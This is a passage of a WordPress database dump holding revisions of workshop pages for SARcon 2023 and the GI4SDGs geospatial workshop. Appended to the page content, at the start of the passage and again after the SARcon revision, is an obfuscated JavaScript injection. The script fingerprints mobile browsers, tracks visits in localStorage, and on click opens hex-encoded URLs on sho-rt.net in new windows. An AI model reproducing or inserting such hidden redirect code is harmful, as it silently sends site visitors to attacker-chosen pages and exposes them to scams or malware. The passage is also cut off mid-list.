_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2023-02-05 14:00:19','2023-02-05 14:00:19','',2736,'https://gsw2023.com/?p=3817',0,'revision','',0),
(3818,1,'2023-02-05 14:01:16','2023-02-05 14:01:16','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">SARcon 2023 - SAR constellations and applications</span></strong></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"25px 20px 20px 20px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\r\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\r\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\r\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Geosynchronous SAR</strong></h6>\r\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\r\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\r\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Surface motion estimation from SAR</strong></h6>\r\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ SAR for surveillance and security related applications</strong></h6>\r\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Scientific Committee:</strong></h5>\r\n<h6><strong>⦁ Prof. Florence Tupin, France</strong></h6>\r\n<h6><strong>⦁ Prof. Jianya Gong, China</strong></h6>\r\n<h6><strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\r\n<h6><strong>⦁ Prof. Chibiao Ding, China</strong></h6>\r\n<h6><strong>⦁ Prof. Yunkai Deng, China</strong></h6>\r\n<h6><strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\r\n<h6><strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\r\n<h6><strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\r\n<h6><strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2023-02-05 14:01:16','2023-02-05 14:01:16','',2736,'https://gsw2023.com/?p=3818',0,'revision','',0),
(3819,1,'2023-02-05 14:04:20','2023-02-05 14:04:20','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">The Geospatial Information and SDG Nexus: GI4SDGs</span></strong></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align: justify; color: black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align: justify; color: black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\n<h6><strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\n<h6><strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\n<h6><strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\n<h6><strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\n<h6><strong>⦁ Other related topics.</strong></h6>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop plans to have the following four technical sessions:</strong></h5>\n<h6><strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\n<h6><strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\n<h6><strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\n<h6><strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>Workshop Chairs</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"48\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee</strong></h5>\n<p>⦁ Yifang Ban, KTH Royal Institute of Technology, Sweden<br />\n⦁ Maria Antonia Brovelli, Politecnico di Milano, Italy<br />\n⦁ Silvana Philippi Camboin, Universidade Federal do Paraná: Curitiba, Brazil<br />\n⦁ Jun Chen, National Geomatics Center of China, China<br />\n⦁ Laurent Durieux, GEO secretariat, France<br />\n⦁ Hongchao Fan, Norwegian University of Science and Technology, Germany<br />\n⦁ Gregory Giuliani, University of Geneva, Geneva, Switzerland<br />\n⦁ Songnian Li, Toronto Metropolitan University, Canada<br />\n⦁ Marguerite Madden, University of Georgia, USA<br />\n⦁ Lucy W. Mburu, College of Technology, KCA University, Kenya<br />\n⦁ Terje Midtbø, Norwegian University of Science and Technology, Norway<br />\n⦁ Jon 